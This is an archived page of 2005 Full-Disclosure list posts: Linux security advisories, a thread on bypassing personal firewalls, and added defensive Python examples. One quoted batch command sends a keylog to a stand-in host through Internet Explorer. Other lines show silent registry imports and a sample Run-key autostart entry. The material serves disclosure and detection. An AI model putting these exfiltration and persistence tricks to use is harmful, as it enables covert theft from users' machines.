[Full-disclosure] [SECURITY] [DSA 839-1] New apachetop packages fix insecure temporary file

2005-10-03 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA 839-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 4th, 2005   http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: apachetop
Vulnerability  : insecure temporary file
Problem type   : local
Debian-specific: no
CVE ID : CAN-2005-2660

Eric Romang discovered an insecurely created temporary file in
apachetop, a realtime monitoring tool for the Apache webserver, that
could be exploited with a symlink attack to overwrite arbitrary files
with the user id that runs apachetop.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 0.12.5-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.12.5-5.

We recommend that you upgrade your apachetop package.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

  Source archives:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1.dsc
  Size/MD5 checksum:  613 cf61395747017a6c8a4319be4cbafe83

http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1.diff.gz
  Size/MD5 checksum: 2956 76b0826270dcf4c51b191b9aaa3f58f8

http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5.orig.tar.gz
  Size/MD5 checksum:   126967 47c40c26319d5718a2a56dcefe06

  Alpha architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_alpha.deb
  Size/MD5 checksum:36262 d532edba02bdf8d4dd2316b68866d906

  AMD64 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_amd64.deb
  Size/MD5 checksum:31370 c8fdae994094269fbe3f597858c8ba14

  ARM architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_arm.deb
  Size/MD5 checksum:30572 dc820d6f5af5a89989705c919f5b8bdb

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_i386.deb
  Size/MD5 checksum:30160 cc20d5d7ab5798ec98966b944259fde4

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_ia64.deb
  Size/MD5 checksum:40446 06f813d834fc7566317c94d4ff07c9ff

  HP Precision architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_hppa.deb
  Size/MD5 checksum:34332 aea9a750be0952a46d1d03f9b0d8d8cd

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_m68k.deb
  Size/MD5 checksum:27844 df4e67fb0a58d32537dd4cb7c88c3e24

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_mips.deb
  Size/MD5 checksum:34964 ab8c82dec697e8567a0b819f25ff1c60

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_mipsel.deb
  Size/MD5 checksum:34864 48009e8eb7bf1cac0178d33bed3594e9

  PowerPC architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_powerpc.deb
  Size/MD5 checksum:33138 22c5a90df13d862497d4fd0060d2d53a

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_s390.deb
  Size/MD5 checksum:31172 120ff918508d38deaf737f22d8a1da96

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_sparc.deb
  Size/MD5 checksum:30532 2a5637a3f94148621756e648b0e9cfdb


  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

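The advisory names the bug class but, as usual for a DSA, not the call that caused it. Below is an added example, written for this page rather than taken from apachetop or Debian, that stages the same symlink attack in a scratch directory: a fixed temp name opened with O_CREAT but without O_EXCL follows a link the local attacker planted first, while O_EXCL and mkstemp(3) do not. The file name apachetop.tmp and the scratch layout are assumptions.

```python
"""Symlink attack on a predictable temporary file, and the two fixes.

Added illustration, not apachetop's code: the advisory does not show the
vulnerable call, so the name 'apachetop.tmp' and the scratch layout are
assumptions. Needs a POSIX filesystem that supports symlinks.
"""
from __future__ import annotations

import os
import tempfile


def open_tmp_insecure(path: str) -> int:
    """Vulnerable pattern: guessable name, O_CREAT without O_EXCL.

    open(2) follows a symlink already sitting at `path`, so the
    'temporary' file is really whatever the link points at.
    """
    return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)


def open_tmp_excl(path: str) -> int:
    """Same fixed name, but O_EXCL: creation fails with EEXIST when anything
    (a file or a symlink, even a dangling one) is already at `path`."""
    return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)


def open_tmp_mkstemp(directory: str) -> tuple[int, str]:
    """Preferred fix: mkstemp(3) picks an unpredictable suffix and opens it
    with O_CREAT|O_EXCL atomically. Keep the fd; never reopen by name."""
    return tempfile.mkstemp(prefix="apachetop.", dir=directory)


def run_symlink_attack(mode: str) -> bool:
    """Stage the race in a fresh directory and report whether the victim
    file ended up overwritten through the attacker's symlink.

    mode: 'insecure' | 'excl' | 'mkstemp'
    """
    with tempfile.TemporaryDirectory() as scratch:
        victim = os.path.join(scratch, "victim")                # stands in for any file the apachetop user may write
        predictable = os.path.join(scratch, "apachetop.tmp")    # assumed guessable temp name

        with open(victim, "w") as f:
            f.write("ORIGINAL")

        # The local attacker wins the race: the link exists before the
        # program creates its temp file, so any later write lands in `victim`.
        os.symlink(victim, predictable)

        fd = None
        try:
            if mode == "insecure":
                fd = open_tmp_insecure(predictable)
            elif mode == "excl":
                fd = open_tmp_excl(predictable)
            elif mode == "mkstemp":
                fd, _path = open_tmp_mkstemp(scratch)
            else:
                raise ValueError(f"unknown mode {mode!r}")
        except FileExistsError:
            fd = None  # O_EXCL refused to follow the planted link

        if fd is not None:
            os.write(fd, b"CLOBBERED")  # what the tool believes is scratch output
            os.close(fd)

        with open(victim) as f:
            return f.read() == "CLOBBERED"


if __name__ == "__main__":
    for mode in ("insecure", "excl", "mkstemp"):
        print(f"{mode:9s} victim overwritten: {run_symlink_attack(mode)}")
```

The O_EXCL-at-a-fixed-name variant closes the overwrite but still lets the attacker park a file at the name and deny service, which is why mkstemp(3) (unpredictable name plus O_EXCL, handing back the descriptor so the file is never reopened by path) is the fix to prefer. On a sarge box the corresponding check is that `dpkg -l apachetop` reports 0.12.5-1sarge1 or later.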

RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Aditya Deshmukh

> say... a backdoor wants to communicate to its server... What it can do
> is use a trusted internal application to do the job. Suppose; it
> creates a batch file, runs the batch file (evil.bat) & executes this
> command

This has been going on for years; there are some trojans that create
an invisible browser window at the screen centre to communicate with the
server.

This is the reason most firewalls show you a popup saying
"[app-name] is trying to connect to [server-name] at [port-number]".







___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
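The thread above describes a backdoor handing its traffic to a trusted browser so the per-application firewall prompt never fires. As an added example (not from any poster, not Zone Labs' code), here is the detection a defender would run over process-creation telemetry: a browser started by something other than the interactive shell, with its data riding in the URL query string. The records are constructed in the shape of Sysmon Event ID 1 (field names Image, ParentImage, CommandLine, ParentCommandLine); the browser and parent lists are assumptions to tune per environment.

```python
"""Detect a trusted browser being driven as a network proxy by another program.

Added example, not a poster's or Zone Labs' code. SAMPLE_EVENTS are
constructed in the shape of Sysmon Event ID 1 (Image, ParentImage,
CommandLine, ParentCommandLine); BROWSERS and INTERACTIVE_PARENTS are
assumed starter lists to tune per environment.
"""
from __future__ import annotations

import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "userinit.exe"}   # user double-clicked / Start->Run
URL_RE = re.compile(r"""(?:https?://|www\.)[^\s"']+""", re.I)

SAMPLE_EVENTS = [
    # user opens IE from the desktop: benign
    {"ProcessId": 1201,
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe"',
     "ParentImage": r"C:\WINDOWS\explorer.exe",
     "ParentCommandLine": "explorer.exe"},
    # user follows a link: benign even though a URL is present
    {"ProcessId": 1340,
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe" https://www.debian.org/security/',
     "ParentImage": r"C:\WINDOWS\explorer.exe",
     "ParentCommandLine": "explorer.exe"},
    # evil.bat hands the keylog to IE in the query string (the thread's trick)
    {"ProcessId": 1488,
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe" www.EvilSite.com/?cmd=submit&f=___KeyLog__',
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "ParentCommandLine": r"cmd.exe /c C:\DOCUME~1\user\LOCALS~1\Temp\evil.bat"},
    # polling for new commands through another browser, from a script host
    {"ProcessId": 1502,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.EvilSite.com/?cmd=ANY_NEW_COMMANDS',
     "ParentImage": r"C:\WINDOWS\system32\wscript.exe",
     "ParentCommandLine": "wscript.exe poll.vbs"},
    # non-browser child of cmd.exe: out of scope for this rule
    {"ProcessId": 1600,
     "Image": r"C:\WINDOWS\system32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "ParentCommandLine": "cmd.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_url(cmdline: str) -> Optional[str]:
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def query_params(url: str) -> dict[str, list[str]]:
    if "://" not in url:
        url = "http://" + url  # bare host form, as in the thread's example
    return parse_qs(urlsplit(url).query)


def analyze(event: dict) -> Optional[dict]:
    """Flag a browser launched by a non-interactive parent; rate it high when
    the command line carries a URL with query parameters (the exfil channel)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    if image not in BROWSERS or parent in INTERACTIVE_PARENTS:
        return None
    url = extract_url(event.get("CommandLine", ""))
    params = query_params(url) if url else {}
    return {
        "pid": event["ProcessId"],
        "browser": image,
        "parent": parent,
        "parent_cmdline": event.get("ParentCommandLine", ""),
        "url": url,
        "params": params,
        "severity": "high" if params else "medium",
    }


def detect(events) -> list[dict]:
    return [f for f in map(analyze, events) if f is not None]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f['pid']} {f['severity']:6s} {f['browser']} <- {f['parent']} "
              f"({f['parent_cmdline']}) params={f['params']}")
```

Legitimate software also opens browsers (a help link from an office application, an installer's "visit our site" page), so the parent list is where this rule gets tuned; the high-severity branch, a non-interactive parent plus parameters in the query string, is the specific pattern from the thread. The polling half of the trick (grep the cache for new commands) shows up in the same telemetry as periodic browser launches from the same parent, which the same rule catches.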


RE: [Full-disclosure] Different Claims by ZoneLabs on the "BypassingPersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

2005-10-03 Thread Todd Towles
If a bulb in my car was found to cause a fire in certain models from a
certain manufacturer, I would want to know exactly which ones were in
danger...not the other way around. Has ZA tested the other versions?
They know 6 isn't vulnerable, but if they don't say that 3 is vulnerable
then we have to "assume" they are. That isn't any type of security
advisory IMHO. 

It just makes the company look like they care more about making you buy
the new version as opposed to protecting their customers. Just my 2
cents

-Todd

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Paul Laudanski
> Sent: Monday, October 03, 2005 6:55 PM
> To: Debasis Mohanty
> Cc: bugtraq@securityfocus.com; 
> full-disclosure@lists.grok.org.uk; 'Zone Labs Security Team'
> Subject: RE: [Full-disclosure] Different Claims by ZoneLabs 
> on the "BypassingPersonalFirewall (Zone Alarm Pro) Using 
> DDE-IPC" issue
> 
> 
> 
> 
> On Mon, 3 Oct 2005, Debasis Mohanty wrote:
> 
> > >> Paul Laudanski
> > >> What I'm saying is that the vendor never claimed ZAP versions prior
> > >> to 5 are not vulnerable in the report.  
> > 
> > Funny Paul!! You are simply exaggerating upon the same point again and
> > again in a new style each time. Well, they don't even say that ZAP
> > versions prior to v5 are vulnerable in their advisory.
> 
> Glad I made you laugh.  We are at odds in this clearly.  Zone 
> Labs aka Cisco imvho has issued a fair and accurate release 
> indicating what is not vulnerable and thereby conversely you 
> know which products are.
> 
> To that end... I move on.
> 
> Paul Laudanski, Microsoft MVP Windows-Security 
> CastleCops(SM), http://castlecops.com
> 
> 


RE: [Full-disclosure] Different Claims by ZoneLabs on the "Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

2005-10-03 Thread Paul Laudanski



On Mon, 3 Oct 2005, Debasis Mohanty wrote:

> >> Paul Laudanski
> >> What I'm saying is that the vendor never claimed ZAP versions prior to 5
> >> are not vulnerable in the report.  
> 
> Funny Paul!! You are simply exaggerating upon the same point again and again
> in a new style each time. Well, they don't even say that ZAP versions prior
> to v5 are vulnerable in their advisory. 

Glad I made you laugh.  We are at odds in this clearly.  Zone Labs aka
Cisco imvho has issued a fair and accurate release indicating what is not
vulnerable and thereby conversely you know which products are.

To that end... I move on.

Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com




Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3

2005-10-03 Thread Morning Wood
> Can you give me an example of a trojan, worm, or another program which has
> added the last USB device installed in the Windows Registry,

yes, see below

>or how about a program, worm, trojan -

some ASM code... ( edited )

  any_key1     db "SYSTEM\CurrentControlSet\AnyKeyIWant", 0
  another_key2 db "SYSTEM\CurrentControlSet\AnotherKeyIWant", 0
  invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr any_key1, 0, NULL, \
         REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, addr hRegkey, NULL
  invoke wsprintf, addr senddata, addr some_value3, addr port
  invoke wsprintf, addr recvdata, addr another_value2, addr port
  invoke RegSetValueEx, hRegkey, addr senddata, 0, REG_SZ, addr recvdata, eax
  invoke RegCloseKey, hRegkey
( repeat for another_key2 )

easily done in C too

or
c:\>regedt32 -s somebad.reg
( will silently install ANY key you want )


> which caused something to be added to the last typed URL?
VNC ( or the aforementioned key writes )

how do you think malware writes startup keys? I am confused by your
statement...
once a system has been compromised, ANYTHING can be written to the registry
( especially if the attacker has SYSTEM privs )



my2bits,
M.W


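The post above ends with `regedt32 -s somebad.reg`, which imports a file without any prompt. As an added example (not M.W.'s code), the block below parses the .reg export format and flags the keys such an import would create, overwrite or delete. The sample file is constructed, and the watch-list paths (the Run keys, the USBSTOR enumeration tree, IE's TypedURLs, RecentDocs) are well-known locations named here as an assumption, since the thread refers to "last USB device" and "last typed URL" without giving key paths.

```python
"""Parse a Windows .reg file and flag what a silent import would change.

Added example, not code from the thread. SAMPLE_REG is constructed; the
WATCHLIST paths are well-known locations assumed here (the thread alludes
to 'last USB device' and 'last typed URL' without naming keys).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

KEY_RE = re.compile(r"^\[(-?)(.+)\]$")                        # [key] creates, [-key] deletes
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')   # "name"=data or @=data

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemUpdate"="C:\\WINDOWS\\Temp\\svchost32.exe -hide"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_Generic&Prod_Flash&Rev_1.00]
"FriendlyName"="Generic Flash USB Device"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
"url1"="http://www.EvilSite.com/?cmd=submit"
"url2"=-

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs]

[HKEY_LOCAL_MACHINE\SOFTWARE\Vendor\App]
@="default"
"Port"=dword:0000a4e1
"Blob"=hex:de,ad,\
  be,ef
'''

# Substrings of lower-cased key paths that deserve a second look (assumed starter list).
WATCHLIST = {
    r"\currentversion\run": "autostart (Run/RunOnce)",
    r"\currentcontrolset\services": "service install",
    r"\enum\usbstor": "USB device history",
    r"\internet explorer\typedurls": "IE typed-URL history",
    r"\explorer\recentdocs": "recent-documents history",
}


@dataclass
class RegOp:
    key: str
    kind: str                    # create_key | delete_key | set | delete_value
    name: Optional[str] = None   # value name ("" = default value); None for key-level ops
    data: object = None


def _unescape(s: str) -> str:
    # .reg string syntax escapes only backslash and double quote
    return re.sub(r'\\(["\\])', r"\1", s)


def _decode_data(raw: str) -> tuple[str, object]:
    raw = raw.strip()
    if raw == "-":
        return "delete_value", None
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return "set", _unescape(raw[1:-1])
    if raw.lower().startswith("dword:"):
        return "set", int(raw[6:], 16)
    m = re.match(r"hex(?:\(\w+\))?:(.*)$", raw, re.I)   # hex:, hex(2):, hex(7): ...
    if m:
        return "set", bytes(int(b, 16) for b in m.group(1).split(",") if b.strip())
    raise ValueError(f"unsupported data syntax: {raw!r}")


def parse_reg(text: str) -> list[RegOp]:
    ops: list[RegOp] = []
    key: Optional[str] = None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        # hex data wraps onto following lines, each ending with a backslash
        while line.endswith("\\") and i < len(lines):
            line = line[:-1] + lines[i].strip()
            i += 1
        if not line or line.startswith(";") or line.startswith(("Windows Registry Editor", "REGEDIT4")):
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(2)
            ops.append(RegOp(key, "delete_key" if m.group(1) else "create_key"))
            continue
        m = VALUE_RE.match(line)
        if m is None or key is None:
            raise ValueError(f"cannot parse line: {line!r}")
        name = "" if m.group(1) is None else _unescape(m.group(1))
        kind, data = _decode_data(m.group(2))
        ops.append(RegOp(key, kind, name, data))
    return ops


def triage(ops: list[RegOp]) -> list[tuple[str, RegOp]]:
    """Pair every operation that touches a watch-listed path with its label."""
    hits = []
    for op in ops:
        k = op.key.lower()
        for needle, label in WATCHLIST.items():
            if needle in k:
                hits.append((label, op))
                break
    return hits


if __name__ == "__main__":
    for label, op in triage(parse_reg(SAMPLE_REG)):
        target = op.key if op.name is None else f"{op.key}\\{op.name or '(Default)'}"
        print(f"{label:26s} {op.kind:13s} {target}")
```

The point for the forensic argument in the thread: an import like this both plants an autostart entry and rewrites or deletes the very keys (USB history, typed URLs, recent documents) an examiner would otherwise read as evidence of user activity, so those artefacts are only as trustworthy as the machine's integrity at the time they were written.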


Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Steve Friedl
On Mon, Oct 03, 2005 at 03:41:58PM -0400, TheGesus wrote:
> In NT4 they redesigned the GDI so that the user could bypass
> "userland" and talk straight to the kernel.
> 
> It's been so long I don't recall the exact details, but this re-hack
> paved the way for  DirectX and sped up the response of the new
> desktop, which of course was lifted from Windows 95.
> 
> After NT4 anything that hooked into the GDI could BSOD.  New video
> driver?  BSOD.  New printer driver?  BSOD.  It was quite a mess.

This is only partly the case; this is the history.

In NT3.51, *all* GDI (printer and video) was done in userland, but
GDI calls involved an expensive context switch and/or local procedure
call. I guess for printer drivers this was not really a big deal,
but for video it matters a lot. Gamers care about this, right?

In NT4 all GDI dove into kernel space, and it provided a substantial
performance boost, but it completely sucked for print driver writers.
No thread support, no real support for floating point math, not any
performance difference to write home about, and a BSOD was as easy
as an assertion failure. Porting a complex user-mode driver to
kernel mode could be a daunting task.

Well, all that silly "but kernel-mode print drivers won't be as robust"
talk turned out to be true, so Windows 2000 supported both kernel mode
(version 2) and user mode (version 3) drivers. I assume that version 1
drivers were NT3.51 usermode.

XP is the same way, and in Server 2003 there is a Group Policy option
that disables kernel mode drivers, and I understand that Vista/Longhorn
will forbid kernel mode print drivers altogether.

Saying that the user "bypasses user mode and talks directly to the
kernel" is not really that meaningful: it doesn't talk "to the kernel",
just to the GDI, and it's not really any different from an IOCTL.

It wasn't terribly robust, but I don't think it was inherently insecure.

Steve (who writes print drivers too)

--- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]


[Full-disclosure] MDKSA-2005:171 - Updated kernel packages fix multiple vulnerabilities

2005-10-03 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   kernel
 Advisory ID:MDKSA-2005:171
 Date:   October 3rd, 2005

 Affected versions:  Corporate 3.0, Multi Network Firewall 2.0
 __

 Problem Description:

 A number of vulnerabilities in the 2.6 Linux kernel have been corrected
 with these updated packages:
 
 An array index overflow in the xfrm_sk_policy_insert function could
 allow a local user to cause a Denial of Service (oops or deadlock) and
 possibly execute arbitrary code (CAN-2005-2456).
 
 The zlib routines in the Linux 2.6 kernel before 2.6.12.5 allowed a
 remote attacker to cause a DoS (crash) via a compressed file with
 "improper tables" (CAN-2005-2458).
 
 The huft_build function in the zlib routines in Linux 2.6 kernels prior
 to 2.6.12.5 returned the wrong value, allowing remote attackers to
 cause a DoS (crash) via a certain compressed file (CAN-2005-2459).
 
 A stack-based buffer overflow in the sendmsg function call in Linux 2.6
 kernels prior to 2.6.13.1 allows local users to execute arbitrary code by
 calling sendmsg and modifying the message contents in another thread
 (CAN-2005-2490).
 
 xattr.c in the ext2 and ext3 file system code in the 2.6 Linux kernel
 did not properly compare the name_index fields when sharing xattr
 blocks which would prevent default ACLs from being applied
 (CAN-2005-2801).
 
 The ipt_recent kernel module in 2.6 Linux kernels prior to 2.6.12 when
 running on 64-bit processors allowed remote attackers to cause a DoS
 (kernel panic) via certain attacks such as SSH brute force
 (CAN-2005-2872).
 
 The ipt_recent kernel module in 2.6 Linux kernels prior to 2.6.12 did
 not properly perform certain time tests when the jiffies value is
 greater than LONG_MAX which could cause ipt_recent netfilter rules to
 block too early (CAN-2005-2873).
 
 The updated packages have been patched to address these issues and all
 users are urged to upgrade immediately.
 
 Updated kernels for Mandrivalinux 10.1 and later will be made available
 soon.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2456
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2458
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2459
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2490
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2801
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2872
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2873
 __

 Updated Packages:
  
 Multi Network Firewall 2.0:
 f7468b4d253251b7c7a5ee84571193c5  mnf/2.0/RPMS/kernel-2.6.3.28mdk-1-1mdk.i586.rpm
 a9d37454e919b348a708922d2aece2ca  mnf/2.0/RPMS/kernel-i686-up-4GB-2.6.3.28mdk-1-1mdk.i586.rpm
 790766354d63b081ce608ee769b73574  mnf/2.0/RPMS/kernel-p3-smp-64GB-2.6.3.28mdk-1-1mdk.i586.rpm
 c5a5e24e5cc9b8c9cc17867966a3d70b  mnf/2.0/RPMS/kernel-secure-2.6.3.28mdk-1-1mdk.i586.rpm
 7cdb6d2c133e02457229ef6eb2a7b405  mnf/2.0/RPMS/kernel-smp-2.6.3.28mdk-1-1mdk.i586.rpm
 9c8a3b678f7a51be86a342a59188  mnf/2.0/SRPMS/kernel-2.6.3.28mdk-1-1mdk.src.rpm

 Corporate 3.0:
 0f6c6ac828beca090b72d4f25b34ded2  corporate/3.0/RPMS/kernel-2.6.3.28mdk-1-1mdk.i586.rpm
 8b228ab0567e6f8cae1e15fe44261f97  corporate/3.0/RPMS/kernel-enterprise-2.6.3.28mdk-1-1mdk.i586.rpm
 4177dbd5341d41d1605b83546b1b419b  corporate/3.0/RPMS/kernel-i686-up-4GB-2.6.3.28mdk-1-1mdk.i586.rpm
 543e310e249819d29d19354cac294376  corporate/3.0/RPMS/kernel-p3-smp-64GB-2.6.3.28mdk-1-1mdk.i586.rpm
 0a6fd8b7c3434a6e903fa2183e5ef23c  corporate/3.0/RPMS/kernel-secure-2.6.3.28mdk-1-1mdk.i586.rpm
 fccb12c9f27dc1b72e4d1ff212ae29d0  corporate/3.0/RPMS/kernel-smp-2.6.3.28mdk-1-1mdk.i586.rpm
 15a9d0b1914ca4b47dc49d694ede1c33  corporate/3.0/RPMS/kernel-source-2.6.3-28mdk.i586.rpm
 a62fc25d549523e00efa006644543dda  corporate/3.0/RPMS/kernel-source-stripped-2.6.3-28mdk.i586.rpm
 9c8a3b678f7a51be86a342a59188  corporate/3.0/SRPMS/kernel-2.6.3.28mdk-1-1mdk.src.rpm

 Corporate 3.0/X86_64:
 8ad1a6656bc68149b775b6012b4b3d10  x86_64/corporate/3.0/RPMS/kernel-2.6.3.28mdk-1-1mdk.x86_64.rpm
 aced128f099513e241f79bceaff13733  x86_64/corporate/3.0/RPMS/kernel-secure-2.6.3.28mdk-1-1mdk.x86_64.rpm
 c67c7c76be4a011de9a6e2c26bd22af6  x86_64/corporate/3.0/RPMS/kernel-smp-2.6.3.28mdk-1-1mdk.x86_64.rpm
 aef5ccc688591da64d004c4eb50a8ad4  x86_64/corporate/3.0/RPMS/kernel-source-2.6.3-28mdk.x86_64.rpm
 2436bca0b07afefecdba53f24a9c8f73  x86_64/corporate/3.0/RPMS/kernel-source-stripped-2.6.3-28mdk.x86_64.rpm
 9c8a3b678f7a51be86a342a59188  x86_64/corporate/3.0/SRPMS/

Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Oliver Leitner
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I think the main problem with every kind of security precaution is that
the user has to understand what he is being told.

I had customers who just let everything in and out because they thought
that their setup would need it.


a few major tricks in really securing a system:
never let the user have write access to c:\putyourwindowssystemdirhere

never run anything as admin user (at least since XP there is even
something like sudo available under Windows, called runas, a very useful
command).

further on the XP level: try to get used to the netsh command.

keep your system updated

and it doesn't matter what you download, as long as you keep your users
security aware (password length and strength, email clicking, banner
clicking, popups, etc...)

or use an alternate OS (yes, they are out there...)

you can make it easier for your user or harder for your user, depending
on your standpoint, but nothing is as good as a user that actually does
know what he/she is doing.

just my few cents.

Greetings
Oliver Leitner
Technical Staff
http://www.shells.at

Debasis Mohanty wrote:
> Just to correct my last statement in my previous reply - 
> 
> >> There is another way by which an evil-code can get this run is by moving
> >> the batch file to system startup 
> >> or pointing it in the registry to run on system boot but this will be a
> >> warning signal for the user.  
> 
> Even ZA Pro blocks and warns the user if some program (evil or trusted) is
> trying to become a system startup program. Sorry for that mistake, had too
> much with Paul & Zone Labs ;-)
> 
> -D
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Debasis
> Mohanty
> Sent: Tuesday, October 04, 2005 12:25 AM
> To: 'Bipin Gautam'; 'Zone Labs Security Team'
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that*
> hard?
> 
> Bipin Gautam wrote:
> 
> >> Anyways... is Bypassing Personal Firewall & let an internal (evil)
> >> application communicate with the external world, that hard?
> 
> 
> Yes Indeed !! As long as you are trying out this concept with the current
> versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it
> even traps inter-process communications and windows messaging between two
> different processes and prompts for user's permission. This goes ahead of
> normal desktop based fw with more defense methods than just protecting a PC
> from network based attacks. 
> 
> 
> 
> >> Suppose; it creates a batch file run the batch file  (evil.bat) &
> >> executes this command
> >> Internet Explorer\> iexplore.exe
> >> www.EvilSite.com/?cmd=submit&f=___KeyLog__
> 
> To execute the batch file, the evil-program needs to trigger the execution
> of the batch file and this is easily prevented by ZA Pro.. Normally the
> evil-code will use the api shell() which is prevented. 
> 
> However, this will work if the users click on the batch file or run it via
> Start->Run but this is not the way evil-code works. In this scenario ZA
> Pro clearly distinguishes between user intervention and a program
> communicating with another program. 
> 
> 
> There is another way by which an evil-code can get this run is by moving the
> batch file to system startup or pointing it in the registry to run on system
> boot but this will be a warning signal for the user. 
> 
> - D
> 
> 
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
> Sent: Monday, October 03, 2005 11:57 PM
> To: Zone Labs Security Team
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
> 
> hello list,
> Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
